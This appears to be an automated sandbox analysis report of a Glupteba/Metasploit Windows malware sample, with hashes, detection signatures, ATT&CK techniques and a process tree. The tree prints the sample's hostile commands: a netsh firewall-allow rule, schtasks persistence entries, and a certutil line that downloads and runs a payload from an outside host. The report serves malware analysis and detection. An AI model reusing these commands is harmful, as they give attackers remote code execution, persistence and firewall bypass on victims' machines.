Analysis

  • max time kernel
    138s
  • max time network
    145s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    04-06-2022 11:01

General

  • Target

    10db50b65cf8adecc3bc9eec24b84d815ecc9aa291e24e36d39310471628afe0.exe

  • Size

    4.4MB

  • MD5

    54a520f5d265e1436948bfac54f97284

  • SHA1

    47ac910cec047fc26990a9a20d7955419d547691

  • SHA256

    10db50b65cf8adecc3bc9eec24b84d815ecc9aa291e24e36d39310471628afe0

  • SHA512

    a999721d5c3e9e5de1bf6e93f89fc37e8ce22b05241ffe345de7fdca42b9b62fa09287444f5c63c3545a25d006ac9fc2a99a3bf62df3d51d22cc22e418367792

Malware Config

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 10 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Windows security bypass 2 TTPs 10 IoCs
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Windows security modification 2 TTPs 10 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in Windows directory 3 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\10db50b65cf8adecc3bc9eec24b84d815ecc9aa291e24e36d39310471628afe0.exe
    "C:\Users\Admin\AppData\Local\Temp\10db50b65cf8adecc3bc9eec24b84d815ecc9aa291e24e36d39310471628afe0.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:1664
    • C:\Users\Admin\AppData\Local\Temp\10db50b65cf8adecc3bc9eec24b84d815ecc9aa291e24e36d39310471628afe0.exe
      "C:\Users\Admin\AppData\Local\Temp\10db50b65cf8adecc3bc9eec24b84d815ecc9aa291e24e36d39310471628afe0.exe"
      2⤵
      • Windows security bypass
      • Loads dropped DLL
      • Windows security modification
      • Adds Run key to start application
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:748
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1864
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
          • Modifies Windows Firewall
          • Modifies data under HKEY_USERS
          PID:568
      • C:\Windows\rss\csrss.exe
        C:\Windows\rss\csrss.exe ""
        3⤵
        • Executes dropped EXE
        • Modifies data under HKEY_USERS
        PID:1896
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
          4⤵
          • Creates scheduled task(s)
          PID:1588
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
          4⤵
          • Creates scheduled task(s)
          PID:1692
  • C:\Windows\system32\makecab.exe
    "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20220604152149.log C:\Windows\Logs\CBS\CbsPersist_20220604152149.cab
    1⤵
    • Drops file in Windows directory
    PID:1484

Network

MITRE ATT&CK Matrix ATT&CK v6

Execution

Scheduled Task

1
T1053

Persistence

Modify Existing Service

1
T1031

Registry Run Keys / Startup Folder

1
T1060

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Defense Evasion

Disabling Security Tools

2
T1089

Modify Registry

3
T1112

Discovery

Query Registry

1
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Windows\rss\csrss.exe
    Filesize

    4.4MB

    MD5

    54a520f5d265e1436948bfac54f97284

    SHA1

    47ac910cec047fc26990a9a20d7955419d547691

    SHA256

    10db50b65cf8adecc3bc9eec24b84d815ecc9aa291e24e36d39310471628afe0

    SHA512

    a999721d5c3e9e5de1bf6e93f89fc37e8ce22b05241ffe345de7fdca42b9b62fa09287444f5c63c3545a25d006ac9fc2a99a3bf62df3d51d22cc22e418367792

  • \Windows\rss\csrss.exe
    Filesize

    4.4MB

    MD5

    54a520f5d265e1436948bfac54f97284

    SHA1

    47ac910cec047fc26990a9a20d7955419d547691

    SHA256

    10db50b65cf8adecc3bc9eec24b84d815ecc9aa291e24e36d39310471628afe0

    SHA512

    a999721d5c3e9e5de1bf6e93f89fc37e8ce22b05241ffe345de7fdca42b9b62fa09287444f5c63c3545a25d006ac9fc2a99a3bf62df3d51d22cc22e418367792

  • \Windows\rss\csrss.exe
    Filesize

    4.4MB

    MD5

    54a520f5d265e1436948bfac54f97284

    SHA1

    47ac910cec047fc26990a9a20d7955419d547691

    SHA256

    10db50b65cf8adecc3bc9eec24b84d815ecc9aa291e24e36d39310471628afe0

    SHA512

    a999721d5c3e9e5de1bf6e93f89fc37e8ce22b05241ffe345de7fdca42b9b62fa09287444f5c63c3545a25d006ac9fc2a99a3bf62df3d51d22cc22e418367792

  • memory/568-65-0x0000000000000000-mapping.dmp
  • memory/568-66-0x000007FEFBEF1000-0x000007FEFBEF3000-memory.dmp
    Filesize

    8KB

  • memory/748-64-0x0000000000400000-0x0000000002FCA000-memory.dmp
    Filesize

    43.8MB

  • memory/748-71-0x0000000000400000-0x0000000002FCA000-memory.dmp
    Filesize

    43.8MB

  • memory/748-61-0x0000000004AC0000-0x0000000004EF0000-memory.dmp
    Filesize

    4.2MB

  • memory/748-62-0x0000000000400000-0x0000000002FCA000-memory.dmp
    Filesize

    43.8MB

  • memory/748-60-0x0000000004AC0000-0x0000000004EF0000-memory.dmp
    Filesize

    4.2MB

  • memory/1664-54-0x0000000004B30000-0x0000000004F60000-memory.dmp
    Filesize

    4.2MB

  • memory/1664-59-0x0000000000400000-0x0000000002FCA000-memory.dmp
    Filesize

    43.8MB

  • memory/1664-58-0x0000000000400000-0x0000000002FCA000-memory.dmp
    Filesize

    43.8MB

  • memory/1664-57-0x0000000000400000-0x0000000002FCA000-memory.dmp
    Filesize

    43.8MB

  • memory/1664-56-0x0000000004F60000-0x000000000586A000-memory.dmp
    Filesize

    9.0MB

  • memory/1664-55-0x0000000004B30000-0x0000000004F60000-memory.dmp
    Filesize

    4.2MB

  • memory/1864-63-0x0000000000000000-mapping.dmp
  • memory/1896-69-0x0000000000000000-mapping.dmp
  • memory/1896-72-0x00000000049D0000-0x0000000004E00000-memory.dmp
    Filesize

    4.2MB

  • memory/1896-73-0x00000000049D0000-0x0000000004E00000-memory.dmp
    Filesize

    4.2MB

  • memory/1896-74-0x0000000004E00000-0x000000000570A000-memory.dmp
    Filesize

    9.0MB

  • memory/1896-75-0x0000000000400000-0x0000000002FCA000-memory.dmp
    Filesize

    43.8MB

  • memory/1896-76-0x0000000000400000-0x0000000002FCA000-memory.dmp
    Filesize

    43.8MB